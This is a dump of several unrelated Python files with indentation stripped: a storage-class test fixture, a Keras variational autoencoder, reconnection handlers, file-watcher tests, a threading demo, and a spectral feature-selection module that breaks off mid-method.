replica (int): if create_new_pool is True, replica will be set.
create_new_pool (bool): True to create new pool with factory.
encryption (bool): enable PV encryption if True.
reclaim_policy (str): Reclaim policy for the storageclass.
existing_pool(str): Use pool name for storageclass.
Return:
(ocs_ci.ocs.resource.ocs) ocs object of the storageclass.
"""
storageclass_ui_object = StorageClassUI(setup_ui)
if existing_pool is None and create_new_pool is False:
pool_name = default_pool
if create_new_pool is True:
pool_ocs_obj = cephblockpool_factory_ui(
replica=replica, compression=compression
)
pool_name = pool_ocs_obj.name
if existing_pool is not None:
pool_name = existing_pool
sc_name = storageclass_ui_object.create_storageclass(pool_name)
if sc_name is None:
log.error("Storageclass was not created")
raise StorageclassNotCreated(
"Storageclass is not found in storageclass list page"
)
else:
log.info(f"Storageclass created with name {sc_name}")
sc_obj = create_ocs_object_from_kind_and_name(
resource_name=sc_name, kind=constants.STORAGECLASS
)
instances.append(sc_obj)
log.info(f"{sc_obj.get()}")
return sc_obj
def finalizer():
for instance in instances:
try:
instance.get()
except CommandFailed:
log.warning("Storageclass is already deleted")
continue
storageclass_ui_obj = StorageClassUI(setup_ui)
if not storageclass_ui_obj.delete_rbd_storage_class(instance.name):
instance.delete()
raise StorageClassNotDeletedFromUI(
f"Could not delete storageclass {instances.name} from UI."
f"Deleted from CLI"
)
request.addfinalizer(finalizer)
return factory
|
vae.py
|
import datetime
from threading import Thread, Lock
from keras import backend as K
from keras.models import clone_model, Model
from keras.layers import Input, Dense, Lambda
from keras.callbacks import TensorBoard
import tensorflow as tf
from config.model import TENSORBOARD_LOG_DIR
from config.model import VAE_MODEL
LOCK = Lock()
latent_dim = 3
epochs = 1
class VAE:
def __init__(self, x_shape, save_interval=100):
"""
        Initialize the VAE settings
        :param x_shape: shape of the full X matrix (not the shape of a single x(i))
"""
m, n = x_shape
hidden_unit_size = n >> 2
self.graph = tf.Graph()
with self.graph.as_default():
self.example = tf.placeholder(shape=(None, n), dtype=tf.float32)
self.queue = tf.FIFOQueue(capacity=20, dtypes=[tf.float32])
self.enqueue = self.queue.enqueue((self.example, ))
self.qr = tf.train.QueueRunner(self.queue, [self.enqueue] * 4)
self.coord = tf.train.Coordinator()
# x = Input(shape=(n, ), name='x')
x = Input(shape=(n, ), dtype=tf.float32, tensor=self.queue.dequeue(), name='x')
h1 = Dense(hidden_unit_size, activation='relu', dtype=tf.float32, name='h1')(x)
mean = Dense(latent_dim, name='mean')(h1)
var = Dense(latent_dim, name='var')(h1)
def sampling(args):
z_mean, z_var = args
epsilon = K.random_normal(shape=K.shape(z_var))
return z_mean + z_var * epsilon
# return z_mean + K.exp(z_var / 2) * epsilon
z = Lambda(sampling, name='z')([mean, var])
decoder_h1 = Dense(hidden_unit_size, activation='relu', name='decoder_h1')(z)
y = Dense(n, activation='sigmoid', name='y')(decoder_h1)
def loss(y_true, y_pred):
kld = (-1 / 2) * (K.sum(1 + K.log(K.square(var)) - K.square(mean) - K.square(var), axis=1))
# kld = (-1 / 2) * K.sum(1 + var - K.square(mean) - K.exp(var))
re = K.mean(K.sum(K.binary_crossentropy(y_true, y_pred), axis=1))
return K.mean(kld + re)
model = Model(inputs=x, outputs=y)
model.compile(optimizer='adam', loss=loss)
# using learn
self._model = model
# using predict without being affected by learning
self.model = clone_model(self._model)
self.y = y
e_x = Input(shape=(n, ), name='e_x')
e_h1 = Dense(hidden_unit_size, activation='relu', name='e_h1')(e_x)
e_mean = Dense(latent_dim, name='e_mean')(e_h1)
e_var = Dense(latent_dim, name='e_var')(e_h1)
e_z = Lambda(sampling, name='e_z')([e_mean, e_var])
self.encoder = Model(inputs=e_x, outputs=e_z)
z_input = Input(shape=(latent_dim,))
d_h1 = Dense(hidden_unit_size, activation='relu', name='d_h1')(z_input)
d_y = Dense(n, activation='sigmoid', name='d_y')(d_h1)
self.decoder = Model(inputs=z_input, outputs=d_y)
# self.a = tf.placeholder(dtype=tf.float32, shape=(None, 2))
# self.b = tf.placeholder(dtype=tf.float32, shape=(None, 2))
# self.ab = self.a + self.b
self.session = tf.Session(graph=self.graph)
K.set_session(self.session)
def learn(self, x_train, x_test=None):
if x_test is not None:
validation_data = (x_test, x_test)
else:
validation_data = None
enqueue_threads = self.qr.create_threads(self.session, coord=self.coord, start=True)
with LOCK:
for i in range(1):
self.session.run(self.enqueue, feed_dict={self.example: x_train})
self.coord.join(enqueue_threads)
# with tf.Session(graph=K.get_session().graph):
# self._model.fit(x=x_train, y=x_train, epochs=epochs, validation_data=validation_data,
# callbacks=[TensorBoard(log_dir=TENSORBOARD_LOG_DIR, histogram_freq=1)])
with LOCK:
w = self._model.get_weights()
self.model.set_weights(w)
self.encoder.set_weights(w[0:len(w) - 4])
self.decoder.set_weights(w[-4:])
self.model.save(VAE_MODEL + datetime.datetime.now().strftime("%Y%m%d%H%M%S") + '.h5')
def predict(self, x):
return self.decoder.predict(self.encoder.predict(x))
def encode(self, x):
# with K.get_session() as sess:
return self.encoder.predict(x)
def decode(self, z):
# with K.get_session() as sess:
return self.decoder.predict(z)
def _show_predict_image(self, x):
import matplotlib.pyplot as plt
import numpy as np
pred = self.predict(x)
plt.imshow(np.reshape(x[0], (28, 28)), cmap='Greys_r')
plt.show()
plt.imshow(np.reshape(pred[0], (28, 28)), cmap='Greys_r')
plt.show()
plt.imshow(np.reshape(x[5000], (28, 28)), cmap='Greys_r')
plt.show()
plt.imshow(np.reshape(pred[5000], (28, 28)), cmap='Greys_r')
plt.show()
def _main(args):
x_train, x_test = args
vae = VAE(x_shape=x_train.shape)
for _ in range(2):
thread = Thread(target=vae.learn, kwargs={'x_train': x_train, 'x_test': x_test})
thread.start()
# vae.learn(x_train, x_test)
# vae.learn(x_train, x_test)
# print(thread.is_alive())
# thread.join()
# print(thread.is_alive())
# vae._show_predict_image(x_test)
if __name__ == '__main__':
from keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(60000, 784)
x_test = x_test.reshape(10000, 784)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
_main((x_train, x_test))
|
reconnection.py
|
import sys
if sys.version_info.major == 2:
from aenum import Enum
else:
from enum import Enum
import threading
import time
class ConnectionStateChecker(object):
def __init__(
self,
ping_function,
keep_alive_interval,
sleep=1):
self.sleep = sleep
self.keep_alive_interval = keep_alive_interval
self.last_message = time.time()
self.ping_function = ping_function
self.running = False
self._thread = None
def start(self):
self.running = True
self._thread = threading.Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
def run(self):
while self.running:
time.sleep(self.sleep)
time_without_messages = time.time() - self.last_message
if self.keep_alive_interval < time_without_messages:
self.ping_function()
def stop(self):
self.running = False
class ReconnectionType(Enum):
raw = 0 # Reconnection with max reconnections and constant sleep time
interval = 1 # variable sleep time
class ReconnectionHandler(object):
def __init__(self):
self.reconnecting = False
self.attempt_number = 0
self.last_attempt = time.time()
def next(self):
raise NotImplementedError()
def reset(self):
self.attempt_number = 0
self.reconnecting = False
class RawReconnectionHandler(ReconnectionHandler):
def __init__(self, sleep_time, max_attempts):
super(RawReconnectionHandler, self).__init__()
self.sleep_time = sleep_time
self.max_reconnection_attempts = max_attempts
def next(self):
self.reconnecting = True
if self.max_reconnection_attempts is not None:
if self.attempt_number <= self.max_reconnection_attempts:
self.attempt_number += 1
return self.sleep_time
else:
raise ValueError("Max attemps reached {0}".format(self.max_reconnection_attempts))
else: # Infinite reconnect
return self.sleep_time
class IntervalReconnectionHandler(ReconnectionHandler):
    def __init__(self, intervals):
        super(IntervalReconnectionHandler, self).__init__()
        self._intervals = intervals
def next(self):
self.reconnecting = True
index = self.attempt_number
self.attempt_number += 1
        if index >= len(self._intervals):
            raise ValueError("Max attempts reached {0}".format(len(self._intervals)))
        return self._intervals[index]
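# A minimal sketch (illustration only, not part of the original module) of how a
# ReconnectionHandler is meant to drive a retry loop: next() returns the sleep time for
# the current attempt and raises ValueError once the attempts are exhausted, while
# reset() is called after a successful reconnect. The `connect` callable is an assumption.
def _demo_reconnect(connect, handler):
    while True:
        try:
            connect()
            handler.reset()
            return True
        except Exception:
            try:
                delay = handler.next()
            except ValueError:
                return False  # attempts exhausted
            time.sleep(delay)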
|
test_filewatch.py
|
import os
import time
import threading
import pytest
from doit.filewatch import FileModifyWatcher, get_platform_system
def testUnsuportedPlatform(monkeypatch):
monkeypatch.setattr(FileModifyWatcher, 'supported_platforms', ())
pytest.raises(Exception, FileModifyWatcher, [])
platform = get_platform_system()
@pytest.mark.skipif('platform not in FileModifyWatcher.supported_platforms')
class TestFileWatcher(object):
def testInit(self, restore_cwd, tmpdir):
dir1 = 'data3'
files = ('data/w1.txt', 'data/w2.txt')
tmpdir.mkdir('data')
for fname in files:
tmpdir.join(fname).open('a').close()
os.chdir(tmpdir.strpath)
fw = FileModifyWatcher((files[0], files[1], dir1))
# file_list contains absolute paths
assert 2 == len(fw.file_list)
assert os.path.abspath(files[0]) in fw.file_list
assert os.path.abspath(files[1]) in fw.file_list
# watch_dirs
assert 2 == len(fw.watch_dirs)
assert tmpdir.join('data') in fw.watch_dirs
assert tmpdir.join('data3') in fw.watch_dirs
# notify_dirs
assert 1 == len(fw.notify_dirs)
assert tmpdir.join('data3') in fw.notify_dirs
def testHandleEventNotSubclassed(self):
fw = FileModifyWatcher([])
pytest.raises(NotImplementedError, fw.handle_event, None)
def testLoop(self, restore_cwd, tmpdir):
files = ['data/w1.txt', 'data/w2.txt', 'data/w3.txt']
stop_file = 'data/stop'
tmpdir.mkdir('data')
for fname in files + [stop_file]:
tmpdir.join(fname).open('a').close()
os.chdir(tmpdir.strpath)
fw = FileModifyWatcher((files[0], files[1], stop_file))
events = []
should_stop = []
started = []
def handle_event(event):
events.append(event.pathname)
if event.pathname.endswith("stop"):
should_stop.append(True)
fw.handle_event = handle_event
def loop_callback(notifier):
started.append(True)
# force loop to stop
if should_stop:
raise KeyboardInterrupt
loop_thread = threading.Thread(target=fw.loop, args=(loop_callback,))
loop_thread.daemon = True
loop_thread.start()
# wait watcher to be ready
while not started: # pragma: no cover
time.sleep(0.01)
assert loop_thread.is_alive()
# write in watched file
fd = open(files[0], 'w')
fd.write("hi")
fd.close()
# write in non-watched file
fd = open(files[2], 'w')
fd.write("hi")
fd.close()
# write in another watched file
fd = open(files[1], 'w')
fd.write("hi")
fd.close()
# tricky to stop watching
fd = open(stop_file, 'w')
fd.write("hi")
fd.close()
time.sleep(0.1)
loop_thread.join(1)
if loop_thread.is_alive(): # pragma: no cover
# this test is very flaky so we give it one more chance...
# write on file to terminate thread
fd = open(stop_file, 'w')
fd.write("hi")
fd.close()
loop_thread.join(1)
if loop_thread.is_alive(): # pragma: no cover
raise Exception("thread not terminated")
assert os.path.abspath(files[0]) == events[0]
assert os.path.abspath(files[1]) == events[1]
|
9.enumerate_all_threads.py
|
# It is not necessary to retain an explicit handle to all of the daemon threads in order
# to ensure they have completed before exiting the main process. enumerate() returns a
# list of active Thread instances. The list includes the current thread, and since joining
# the current thread is not allowed (it introduces a deadlock situation), it must be skipped.
import random
import threading
import time
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def worker():
"""thread worker function"""
t = threading.currentThread()
pause = random.randint(1, 50)
logging.debug('sleeping %s', pause)
time.sleep(pause)
logging.debug('ending')
return
for i in range(3):
t = threading.Thread(target=worker)
t.setDaemon(True)
t.start()
main_thread = threading.currentThread()
for t in threading.enumerate():
if t is main_thread:
continue
logging.debug('joining %s', t.getName())
t.join()
|
spectral_methods.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Spectral feature selection methods that include Laplacian score, MCFS and SPEC
--------------------------------------------------------------------------------------------------------------------
References:
- He, X., Cai, D., & Niyogi, P. (2006). Laplacian score for feature selection. In NIPS. MIT Press.
- Deng Cai, Chiyuan Zhang, and Xiaofei He. Unsupervised feature selection for multi-cluster data.KDD, 2010
- Zheng Zhao and Huan Liu. Spectral feature selection for supervised and unsupervised learning. In ICML, 2007
--------------------------------------------------------------------------------------------------------------------
"""
# Author: Kaveh Mahdavi <kavehmahdavi74@gmail.com>
# License: BSD 3 clause
# TODO: the output of the eigendecomposition needs to be checked; the columns of the output are the eigenvectors.
# Fixme: remove the index from the feature list
import argparse
import heapq
import json
import math
import operator
import sys
import time
import warnings
import numpy as np
import pandas as pd
from sklearn import linear_model
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.preprocessing import scale
from terminaltables import DoubleTable
from kavica.Mutual_knn import KNN
from kavica.distance_measure import rbf_kernel
from kavica.imputation.base import data_structure_Compatibilization
from kavica.resampling import WightedBootstrapping
from multiprocessing import Process
from multiprocessing.managers import BaseManager
# TODO: it has to be moved to the utility module
def list_splitter(alist, chunks=2):
length = len(alist)
if length < chunks:
raise ValueError("The list can not be splitter into {} chunks that is bigger than list size {}.".format(chunks,
length))
return [alist[i * length // chunks: (i + 1) * length // chunks]
for i in range(chunks)]
def gamma(X):
# default is 1.0/2std
return 1 / (2 * X.std(axis=0).mean())
# TODO: this needs to be written to eliminate the redundancy
def has_fitted(estimator, attributes, msg=None, all_or_any=any):
pass
def sort_parja(x, y, order=-1):
# TODO: parameter check (numpy array)
index = np.array(x).argsort(kind='quicksort')
return (np.array(x)[index][::order], np.array(y)[index][::order])
# read the configuration file for preparing the features
def __configoration(config, data):
# read the configuration file
with open(config, 'r') as config:
config_dict = json.load(config)
# Read the data file
df = pd.read_csv(data)
# config the data set based on configuration information
df = df[list(config_dict['hardware_counters'].values())] # sub set of features
df = df.replace([np.inf, -np.inf], np.nan)
lastShape = df.shape
    # Remove the rows that are entirely zero
    df = df[(df.T != 0).any()]
    print("Eliminated {} rows that were entirely zero.".format(lastShape[0] - df.shape[0]))
lastShape = df.shape
# Remove all NaN columns.
    df = df.loc[:, (pd.notnull(df)).any()]
    print("Eliminated {} columns that were entirely null.".format(lastShape[1] - df.shape[1]))
if config_dict['missing_values'] == 'mean':
df.fillna(df.mean(), inplace=True)
if config_dict['scale']:
df = pd.DataFrame(scale(df), index=df.index, columns=df.columns)
print(df.mean(axis=0), df.std(axis=0))
    # fixme: it just resets the indexing for testing
df = df.reset_index()
return df
def progress(count, total, status=''):
bar_len = 100
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '=' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('\r\033[1;36;m[%s] %s%s ...%s' % (bar, percents, '%', status))
sys.stdout.flush()
def arguments_parser():
# set/receive the arguments
if len(sys.argv) == 1:
# It is used for testing and developing time.
arguments = ['config/config_FS_gromacs_64p_INS_CYC.json',
'../parser/source.csv',
'-k',
'2',
'-m',
'LS',
'-bsize',
'2500'
]
sys.argv.extend(arguments)
else:
pass
# parse the arguments
parser = argparse.ArgumentParser(description='The files that are needed for selecting features most important.')
    parser.add_argument('config', help='A .json configuration file that includes the '
                                       'thread numbers, hardware counters, etc.')
parser.add_argument('csvfile', help='A .csv dataset file')
parser.add_argument('-k',
dest='k',
default=2,
action='store',
type=int,
help="It significances the number of the most important features.")
parser.add_argument('-m',
dest='m',
default='LS',
choices=['LS', 'MCFS', 'SPEC'],
action='store',
type=str.upper,
help="The feature selection method that is either LS, MCFS or SPEC.")
parser.add_argument('-bsize',
dest='bsize',
default=2500,
action='store',
type=int,
help="It significances the 'Bag size' or 'ensemble size'.")
args = parser.parse_args()
if args.k < 2:
raise ValueError("Selected features have to be (=> 2). It is set {}".format(args.k))
return ({"configPath": args.config,
"csvPath": args.csvfile,
"k_features": args.k,
"featureSelectionMethod": args.m,
"bag_size": args.bsize})
######################################################################
# Graph weighting functions
######################################################################
def _identity():
return 1
def dot_product(X, Y):
return np.dot(X, Y)
######################################################################
# Accelerator
######################################################################
class GraphUpdateAccelerator(object):
"""
    It accelerates the graph edge updating by leveraging multiprocessing.
    Input: An adjacency list (graph).
    Output: An adjacency list (graph).
    The graph edges are updated by different processes.
"""
def __init__(self, adjacency_list, gama=None):
self.adjacency_list = adjacency_list
self.gama = gama
@staticmethod
def progress_bar(counter, total, process_id=1, status='', functionality=None):
bar_len = 40
filled_len = int(round(bar_len * counter / float(total)))
percents = round(100.0 * counter / float(total), 1)
bar = '|' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write(
'\r\033[1;36;m[%s] <%s> chunk_id <%s> %s%s ...%s' % (bar,
functionality,
process_id,
percents,
'%',
status))
sys.stdout.flush()
return 0
def set(self, data, process_id):
progress_line_len = len(data)
actual_progress = 0
for v in data:
actual_progress += 1
self.progress_bar(actual_progress,
progress_line_len,
process_id,
status=str(actual_progress) + "/" + str(progress_line_len) + " ",
functionality='Update by RBf_kernel')
v = self.adjacency_list.get_vertex(str(v))
vid = v.get_id()
for w in v.get_connections():
wid = w.get_id()
euclidean_weight = v.get_weight(w)
rbf_weight = rbf_kernel(pre_distance=euclidean_weight, gamma=self.gama)
self.adjacency_list.update_edge(str(vid),
str(wid),
rbf_weight,
smallest=False)
def get(self):
return self.adjacency_list
def update_accelerator(obj, items, process_id):
obj.set(items, process_id)
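# A minimal, self-contained sketch (hypothetical names, illustration only) of the pattern
# GraphUpdateAccelerator relies on: BaseManager proxies a single stateful object so that
# several worker processes can mutate it through set(), and the merged state is read back
# from the manager process via get().
class _DemoAccumulator(object):
    def __init__(self):
        self._items = []
    def set(self, chunk, process_id):
        # Record which process handled which item.
        self._items.extend((process_id, item) for item in chunk)
    def get(self):
        return self._items
def _demo_manager_pattern(chunks):
    BaseManager.register('DemoAccumulator', _DemoAccumulator)
    manager = BaseManager()
    manager.start()
    shared = manager.DemoAccumulator()
    workers = [Process(target=update_accelerator, args=[shared, chunk, chunk_id])
               for chunk_id, chunk in enumerate(chunks)]
    for p in workers:
        p.start()
    for p in workers:
        p.join()
    return shared.get()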
######################################################################
# Base class
######################################################################
class _BaseSpectralSelector(object):
"""Initialize the spectral feature selection.
- Generate the KNN graph and matrix.
- Calculate the RBF kernel values and update the KNN graph
Parameters
"""
def __init__(self, X=None, method=None, default_boostrap_bag_size=4500):
self.hasFitted = False
self.adjacencyList = KNN()
self.originData = X
self.adjacencyMatrix = None
self.original_index = None
self.default_boostrap_bag_size = default_boostrap_bag_size
self.featureScoure = {'method': method, 'features': None, 'scores': np.array([])}
@staticmethod
def progress_bar(counter, total, process_id=1, status='', functionality=None):
bar_len = 40
filled_len = int(round(bar_len * counter / float(total)))
percents = round(100.0 * counter / float(total), 1)
bar = '|' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write(
'\r\033[1;36;m[%s] <%s> chunk_id <%s> %s%s ...%s' % (bar,
functionality,
process_id,
percents,
'%',
status))
def fit(self, X, adjacencyMatrix=True, parallel=True,
recursion_limit=None, multi_process=None, bag_size=None):
"""Run KNN on the X and obtain the adjacencyList.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
The training input samples.
adjacencyMatrix:
parallel:
recursion_limit:
multi_process:
bag_size:
Returns
-------
self : object
"""
if bag_size:
self.default_boostrap_bag_size = bag_size
# fixme: it is a duplicated action
self.originData = data_structure_Compatibilization(data=X,
header=True,
index=True)
# make copy of the old index (for distributed matching)
self.originData = self.originData.drop(axis=1, labels=['index']) # After pandas 0.21.0 : columns=['index']
# Resampling from the data, the high duration is more probable for selecting.
# TODO:
"""
        Implement a stochastic method for selecting from different bags
        (the one that is closest to the original data).
        For now, we just generate one bag.
"""
if self.originData.shape[0] < self.default_boostrap_bag_size:
self.default_boostrap_bag_size = self.originData.shape[0]
else:
pass
try:
self.originData = WightedBootstrapping.wighted_resampeling(X=self.originData,
bag_size=self.default_boostrap_bag_size,
replace=True,
bags=1,
weight='Duration').get('0')
except ValueError:
# In case of:Invalid weights: weights sum to zero
self.originData = WightedBootstrapping.wighted_resampeling(X=self.originData,
bag_size=self.default_boostrap_bag_size,
replace=True,
bags=1).get('0')
finally:
            self.originData.reset_index(inplace=True)  # resetting the index is needed, some indexes are missing
self.original_index = self.originData['index'].copy()
self.originData = self.originData.drop(axis=1, labels=['Duration'])
self.originData = self.originData.drop(axis=1, labels=['index']) # After pandas 0.21.0 : columns=['index']
        # fixme: it is obligatory to standardize the data; this should move to data pre-processing
self.originData = pd.DataFrame(scale(self.originData,
with_mean=True,
with_std=True,
copy=False),
index=self.originData.index,
columns=self.originData.columns)
        # Initiate the feature rank list that will be updated by the specific methods
self.featureScoure['features'] = np.array(self.originData.columns.tolist())
self._check_params(self.originData)
self.adjacencyList.fit(self.originData,
adjacencyMatrix=False,
header=True,
index=True)
gammaValue = gamma(self.originData)
# TODO: Combine with filter and ensemble
        # TODO: Matrix product version of rbf_kernel? It would be faster than the Euclidean one.
'''
        Alternative to rbf_kernel:
        rbf_kernel_matrix = lambda x: np.exp(x ** 2 * (-gammaValue))
        rbf_kernel_matrix(self.adjacencyList.graph_to_matrix())
'''
if parallel:
# TODO: Use multiprocess + HDF5 here
if recursion_limit is None:
                # TODO: an optimal value for it needs to be found.
recursion_limit = self.originData.shape[0] ** 2
                warnings.warn(
                    "The recursion_limit is set to {} automatically.".format(recursion_limit), UserWarning)
else:
warnings.warn("v The recursion_limit is set to {} manually.".format(recursion_limit, UserWarning))
sys.setrecursionlimit(recursion_limit)
if multi_process is None:
                # TODO: the optimal chunk number needs to be calculated.
                chunk_number = 10
                warnings.warn("The multi_process is set to {} by default.".format(chunk_number), UserWarning)
else:
chunk_number = multi_process
BaseManager.register('FastUpdate', GraphUpdateAccelerator)
manager = BaseManager()
manager.start()
temporal_knnGraph = manager.FastUpdate(self.adjacencyList.knnGraph, gama=gammaValue)
# TODO: rewrite it as a module.
chunks = list_splitter(list(self.adjacencyList.knnGraph.vert_dict.keys()), chunks=chunk_number)
processes = [Process(target=update_accelerator, args=[temporal_knnGraph, chunks[chunk_id], chunk_id]) for
chunk_id in range(0, chunk_number)]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
if p.is_alive():
print("Job {} is not finished!".format(p))
            # Gather the data from the different processes
self.adjacencyList.knnGraph = temporal_knnGraph.get()
else:
progress_line_len = len(self.adjacencyList.knnGraph.vert_dict) * self.adjacencyList.k_nighbors
actual_progress = 0
print('\n')
for v in self.adjacencyList.knnGraph:
vid = v.get_id()
for w in v.get_connections():
actual_progress += 1
self.progress_bar(actual_progress,
progress_line_len,
1,
status=str(actual_progress) + "/" + str(progress_line_len),
functionality='Update by RBf_kernel')
wid = w.get_id()
'''
Old rbf: rbf_kernel(X=self.originData.loc[int(vid)],
Y=self.originData.loc[int(wid)],
gamma=gammaValue)
'''
euclidean_weight = v.get_weight(w)
rbf_weight = rbf_kernel(pre_distance=euclidean_weight, gamma=gammaValue)
self.adjacencyList.knnGraph.update_edge(str(vid),
str(wid),
rbf_weight,
smallest=False)
if adjacencyMatrix:
self.adjacencyMatrix = self.adjacencyList.graph_to_matrix(binary=False)
self.hasFitted = True
return self
# Sort Descending.
def _sorted_features(self, order=-1):
index = np.array(self.featureScoure['scores']).argsort(kind='quicksort')
return {'sorted_features': self.featureScoure['features'][index][::order],
'sorted_scores': self.featureScoure['scores'][index][::order],
'ordered': order}
def feature_score_table(self):
sortedFeatureScore = self._sorted_features()
if sortedFeatureScore.get('ordered') == 1:
sort_arrow = '\u2191'
elif sortedFeatureScore.get('ordered') == -1:
sort_arrow = '\u2193'
else:
raise ValueError("The ordered direction has to be ascending or descending.")
table_data = [
['Rank', 'Feature', str('Score ' + sort_arrow)]
]
for rank, featureItem in enumerate(sortedFeatureScore['sorted_features']):
table_data.append([rank,
featureItem,
sortedFeatureScore['sorted_scores'][rank]])
table = DoubleTable(table_data,
title='{}'.format(str.upper(self.featureScoure['method'])))
table.justify_columns[2] = 'center'
return table
def _check_params(self, X):
pass
# TODO: It is needed to add progress bar to flow the process.
######################################################################
# Specific methods
######################################################################
# done: it has been sped up.
class LaplacianScore(_BaseSpectralSelector):
""" Ranking the features according to the smallest Laplacian scores.
Objective function:
Min
Parameters:
----------
Attributes:
----------
Examples:
--------
See also:
https://papers.nips.cc/paper/laplacian-score-for-feature-selection.pdf
"""
def __init__(self, X=None, k=None):
        # It is only for uniformity across methods; k is not used by LS.
self.k = k
super(LaplacianScore, self).__init__(X, 'LaplacianScore')
# Sort the list Ascending.
def _sorted_features(self, order=1):
return super(LaplacianScore, self)._sorted_features(order=order)
def rank_features(self, X=None):
if X is not None:
self.fit(X)
elif self.hasFitted:
pass
else:
            raise ValueError('The model has not been fitted and X is None')
degreeMatrix = np.array(self.adjacencyMatrix.sum(axis=1))
        graphLaplacian = np.subtract(np.diag(degreeMatrix), self.adjacencyMatrix)
for feature in self.originData.columns:
featureVector = np.array(self.originData[feature].tolist())
featureRHat = np.array(featureVector
- (np.dot(featureVector, degreeMatrix)
/ degreeMatrix.sum()))
# todo: check the functionality of transpose
            featureLaplacianScore = np.dot(np.dot(featureRHat, graphLaplacian),
                                           featureRHat.transpose())
self.featureScoure['scores'] = np.append(self.featureScoure['scores'],
featureLaplacianScore)
def _check_params(self, X):
pass
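# A standalone numerical sketch (illustration only; the class above ranks features through
# its fitted KNN graph) of the Laplacian score as defined in He et al. (2006): for a feature
# vector f, affinity matrix S, degree matrix D and Laplacian L = D - S, the score is
# (f_tilde' L f_tilde) / (f_tilde' D f_tilde) with f_tilde = f - (f' D 1 / 1' D 1) * 1,
# and smaller scores indicate better locality-preserving features.
def _laplacian_score_reference(feature_vector, affinity_matrix):
    degree = np.diag(affinity_matrix.sum(axis=1))
    laplacian = degree - affinity_matrix
    ones = np.ones(len(feature_vector))
    f_tilde = feature_vector - (feature_vector @ degree @ ones) / (ones @ degree @ ones)
    return (f_tilde @ laplacian @ f_tilde) / (f_tilde @ degree @ f_tilde)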
class MultiClusterScore(_BaseSpectralSelector):
""" Ranking the features according to the highest Multi-Cluster Score.
Objective function: Max
Parameters
----------
Attributes
----------
Examples
--------
See also
--------
http://www.cad.zju.edu.cn/home/dengcai/Publication/Conference/Multi-*cluster_analysis-feature-selection.pdf
"""
def __init__(self, X=None, k=None, d=None):
super(MultiClusterScore, self).__init__(X, 'Multi-Cluster')
self.k_clusters = k
self.d_selectedFeatures = d
def __k_cluster_estimator(self):
k = round(math.sqrt(self.originData.shape[0]))
if math.fmod(k, 2) == 1:
return k
else:
return k + 1
def __update_scores(self, coefficientVector):
coefficientVector = np.absolute(coefficientVector)
if not len(self.featureScoure['scores']):
self.featureScoure['scores'] = coefficientVector
for index, featureScoreItem in enumerate(self.featureScoure['scores']):
self.featureScoure['scores'][index] = max(featureScoreItem,
coefficientVector[index])
# TODO: make the output colorized if the value is changed in any iteration
def rank_features(self, X=None):
if X is not None:
self.fit(X)
elif self.hasFitted:
pass
else:
            raise ValueError('The model has not been fitted and X is None')
degreeMatrix = np.array(self.adjacencyMatrix.sum(axis=1))
graphLaplacian = np.subtract(np.diag(degreeMatrix), self.adjacencyMatrix)
# Calculate spectral Decomposition of graph Laplacian
graphLaplacian = np.dot(np.linalg.inv(graphLaplacian), graphLaplacian)
eigenValues, eigenVectors = np.linalg.eigh(graphLaplacian)
# The eigen values have to be abs()
eigenValues = np.abs(eigenValues)
# TODO: it should move to _check_parameter
with warnings.catch_warnings():
warnings.simplefilter("default", UserWarning)
# Initiate the k
if self.k_clusters is None:
                # fixme: the k estimator has to be written
                self.k_clusters = self.__k_cluster_estimator()
                warnings.warn('\n The k parameter has not been indicated; it is set automatically to {}.'
.format(self.k_clusters), UserWarning, stacklevel=2)
elif self.k_clusters > len(eigenValues):
raise ValueError("k (multi-clusters) > {} flat embedding vectors.".format(len(eigenValues)))
# Initiate the d
if self.d_selectedFeatures is None:
self.d_selectedFeatures = self.originData.shape[1]
print("\n")
                warnings.warn('The d selected features has not been indicated; it is set automatically to {}.'
.format(self.d_selectedFeatures), UserWarning, stacklevel=2)
elif self.d_selectedFeatures > self.originData.shape[1]:
print("\n")
raise ValueError(
'The d selected Features > {} flat embedding vectors.'.format(self.originData.shape[1]))
eigens = dict(zip(eigenValues.real,
eigenVectors))
eigens = dict(sorted(eigens.items(),
key=operator.itemgetter(0),
reverse=True)) # sort inplace
# Solve the L1-regularized regressions K time
reg = linear_model.Lars(n_nonzero_coefs=self.d_selectedFeatures)
for eigenItem in range(self.k_clusters):
_, vector = eigens.popitem()
reg.fit(self.originData, vector)
self.__update_scores(np.array(reg.coef_))
def _check_params(self, X):
pass
class SPEC(_BaseSpectralSelector):
""" Ranking the features according to the highest Laplacian scores.
Parameters
----------
K: it is the number of the clusters
Attributes
----------
Examples
--------
See also
--------
https://papers.nips.cc/paper/laplacian-score-for-feature-selection.pdf
"""
    # TODO: rewrite the feature sorting function so that it can accept the sorting parameter
"""
Separability_scores and Normalized_Separability_scores are Ascending
and K_cluster_Separability_scores is Descending.
"""
def _sorted_features(self, order=1, sort_by="Separability_scores"):
if sort_by == "Separability_scores":
index = np.array(self.featureScoure['Separability_scores']).argsort(kind='quicksort')
elif sort_by == "Normalized_Separability_scores":
index = np.array(self.featureScoure['Normalized_Separability_scores']).argsort(kind='quicksort')
elif sort_by == "K_cluster_Separability_scores":
index = np.array(self.featureScoure['K_cluster_Separability_scores']).argsort(kind='quicksort')
order = -1
else:
            raise ValueError('The score {} is not defined. (Separability_scores, '
'Normalized_Separability_scores, '
'K_cluster_Separability_scores)'.format(sort_by))
return {'sorted_features': self.featureScoure['features'][index][::order],
'sorted_Separability': self.featureScoure['Separability_scores'][index][::order],
'sorted_Normalized_Separability': self.featureScoure['Normalized_Separability_scores'][index][::order],
'sorted_K_cluster_Separability': self.featureScoure['K_cluster_Separability_scores'][index][::order],
'sort_by': sort_by}
def feature_score_table(self):
sortedFeatureScore = self._sorted_features()
table_data = [
['Rank',
'Feature',
'Separability_scores \u2191',
'Normalized_Separability_scores',
'K_cluster_Separability_scores']
]
